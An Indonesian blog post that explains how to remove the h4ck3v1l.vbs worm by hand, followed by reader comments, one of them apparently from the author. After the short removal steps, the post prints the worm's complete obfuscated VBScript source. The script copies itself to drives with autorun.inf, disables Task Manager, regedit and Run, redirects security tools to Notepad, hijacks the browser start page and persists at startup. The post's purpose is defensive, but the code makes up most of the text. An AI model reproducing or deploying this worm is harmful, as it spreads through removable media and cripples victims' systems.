Tuesday, December 30, 2008

Cara Membunuh Virus h4ck3v1l.vbs

Akhir bulan Desember ini saya disibukkan dengan datangnya tamu yang ga' diundang ke kompi saya. Sebenarnya memang udah tau sih kalau kompi saya bakal kedatangan tamu yang ga' diundang itu, soalnya ga' ada cara lain lagi buat ngumpulin tugas adek-adek yang lagi belajar buat website statik, dan kebetulan kemaren itu waktunya mepet kali untuk ngumpulin tugas, jadi terpaksa anunya(flashdisk) di colokin kekomputer saya. Awalnya sih memang di scan terlebih dahulu ama antivirus luar yang ter-update, tapi ga' ada satupun yang kedeteksi ama antivirusnya. Pusing, pusing, pusing, sakit hati iya juga, gara-gara tamunya ngerjain yang ga' seharusnya di kerjain. Gimana ga' sakit hati, menu yang di hilangin antara lain adalah :

1. Run (yang keluar malah notepad dgn bahasa amburadul)
2. Search (fasilitas pencarian file/folder)
3. Command Promt (yang keluar adalah tulisan amburadul juga di aplikasi notepad)
4. Task Manager(Ctrl+Alt+Del) (yang keluar masih tulisan amburadul)
5. Regedit (sama dengan yang diatas, errornya)
6. Menu Options pada windows explorer di hilangin juga,
7. Parahnya lagi, pake acara hidden file dan ga' bisa nginstal aplikasi apapun.

Tapi ga' pha2x... sekarang saya udah tau gimana caranya ngilangin virus ini. Rupanya virus ini lebih asyik dihilangin dengan cara manual dibandingkan dengan menggunakan antivirus. Gimana ya... caranya ? he.. he.. he.. sabar dikit mas...

Sebelumnya kamu harus punya peralatan perangnya dulu (buat yang trouble-nya mirip dengan diatas). Kamu bisa download peralatan perangnya di blognya PC Guru atau dapat juga download pada link dibawah ini :
1. Regalyzer (pengganti Registry Editor)
2. Freecommander (pengganti Windows Explorer buat lihat file yang di hidden)

Jangan lupa Antivirus yang handal buat men-scan jika telah selesai dibunuh virusnya. Atau pengen download aplikasi lain sebagai pendukung jika dianggap perlu untuk proses eksekusi virusnya.

Kira-kira step-step yang harus kita lakukan adalah sbb:
1. Non aktifkan(disable) dulu System Restore
2. Restart komputernya
3. Masuk ke safe mode
4. Buka Regalyzer, cari file yg berhubungan dg h4ck3v1l.vbs(gunakan fasilitas Find)
5. Hapus/modifikasi values yang berhubungan dengan h4ck3v1l.vbs pada Regedit
6. Restart lagi komputernya
7. Buka freecommander cari dan hapus setiap file yg berhubungan dgn h4ck3v1l.vbs
8. Hapus semua file temp IE
9. Matikan proses/service/startup h4ck3v1l.vbs (jika masih ditemukan di Msconfig)
10. Terakhir scan dengan menggunakan antivirus buat siaga akhir.
11. Enjoy...

Berikut saya tampilkan source code h4ck3v1l.vbs
'h4ck3v1l.vbs
on error resume next
dim mysource,winpath,HGjYuiyJWX,fs,mf,atr,tf,rg,nt,check,sd
atr = fNIOEKUfRA("^ovspuvb\")&vbcrlf&fNIOEKUfRA("tcw/m2w4ld5i!fyf/uqjsdtx>fuvdfyfmmfit")
set fs = createobject(fNIOEKUfRA("udfkcPnfutzTfmjG/hojuqjsdT"))
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes = 32
set tf=fs.createtextfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"),2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes = 39
for each HGjYuiyJWX in fs.drives
If (HGjYuiyJWX.drivetype = 1 or HGjYuiyJWX.drivetype = 2) and HGjYuiyJWX.path <> fNIOEKUfRA(";B") then
set tf=fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes =32
set tf=fs.createtextfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"),2,true)
tf.write mysource
tf.close
set tf=fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes =39
set tf =fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"))
tf.attributes = 32
set tf=fs.createtextfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"),2,true)
tf.write atr
tf.close
set tf =fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"))
tf.attributes=39
end if
next
set rg = createobject(fNIOEKUfRA("mmfiT/uqjsdTX"))
rg.regwrite fNIOEKUfRA("]eobnnpd]mmbutoJ]mmfit]fmjggoj]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm")
rg.regwrite fNIOEKUfRA("]eobnnpd]ofqp]mmfit]fmjghfs]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm")
rg.regwrite fNIOEKUfRA("]eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm")
rg.regwrite fNIOEKUfRA("]eobnnpd]ofqp]mmfit]fmjg4qn]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("tcw/m2w4ld5i")
rg.regwrite fNIOEKUfRA("sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("zbmqtjEtnfuJzbsUpO")
rg.regwrite fNIOEKUfRA("ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("fyf/qnbojX]qnbojX]tfmjG!nbshpsQ];D"), fNIOEKUfRA("HOJSUT`HFS")
rg.regwrite fNIOEKUfRA("topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("eojGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA(fNIOEKUfRA("2")), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("uyFfmjGfejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("fubjdpttBfmjGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ujefhfSfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ovSpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ENDfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("shNltbUfmcbtjE]nfutzt]tfjdjmpq]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/end]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/34uefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/shNltbU]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/cjsuub]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/mmbutoj]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/qvuft]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("m2w4ld5i]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),winpath&fNIOEKUfRA("tcw/m2w4ld5i]")
rg.regwrite fNIOEKUfRA("fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"),fNIOEKUfRA("mu/fhbq/777mfsvB/xxx00;quui")
rg.regwrite fNIOEKUfRA("fmujU!xpeojX]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"),fNIOEKUfRA("777!MFSVB!ZC!EFLDBI")
rg.regwrite fNIOEKUfRA("sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("777!mfsvB"),fNIOEKUfRA("HOJSUT`HFS")
rg.regwrite fNIOEKUfRA("opjub{jobhsPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("4d2m1Q!juoB"),fNIOEKUfRA("HOJSUT`HFS")
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(fNIOEKUfRA("mmfit/uqjsdtX"))
sd.run winpath&fNIOEKUfRA("!$udfmft0$f0!fyf/sfspmqyf]")&Wscript.ScriptFullname
Function fNIOEKUfRA(eaYRjLasVU)
Dim i, tmp2
For i = 1 To Len(eaYRjLasVU)
tmp2 = Chr(Asc(Mid(eaYRjLasVU, i, 1)) - 1) + tmp2
Next
fNIOEKUfRA = tmp2
End Function
Untuk informasi pendukung lainnya, silahkan tanya dengan paman google atau gabung dengan teman-teman dimillis yang membahas masalah virus. Thnks... selamat mencoba !

Comments :

5 Comments to “Cara Membunuh Virus h4ck3v1l.vbs”

elec_mechanical said...
on 

paling aman pake linux ae....hehheehhe...ya namane window..biasa langganan virus

T. Khairil Ahsyar said...
on 

Iya nich... rencananya udah lama mo hijrah habis2an ke linux. Cuma yang laennya lagi familiar sm windaow. Linux baru dipake untuk pembelajaran dan keserver doank...

basrul said...
on 

wiiiih manteb juga nih ilmunya. Thanx aja dech. Salam kenal

Aurel 666 said...
on 

Sory bro, kalo virus gw dah bikin lo pusing...wkwkwkwkwkwkwkw
padahal cuman buat iseng aja, taunya dah sampe ke pekanbaru juga, naik mobil atau naek apan yah kesana ??

WKWKWKWKWK



salam dari Minang GRey HAt


Aurel 666 aka H4ck3v1l

T. Khairil Ahsyar said...
on 

Indak tau juo da. Mungkin virusnyo ikuik travel pai ko pekanbaru. Tapi indak ba'a do, alah dape' ilmunyo untuak ngilangin virus uda... Thnk's komentarnyo. (berserakan bhs minangnya, padahal saya bukan orang minang lho. Kalo ga' ngerti bhs minangnya, silahkan translate di google translate (kalau ada) bagi yang mo belajar bahasa minang. He...he...2x)

 

Copyright © 2014 by Tengku Khairil Ahsyar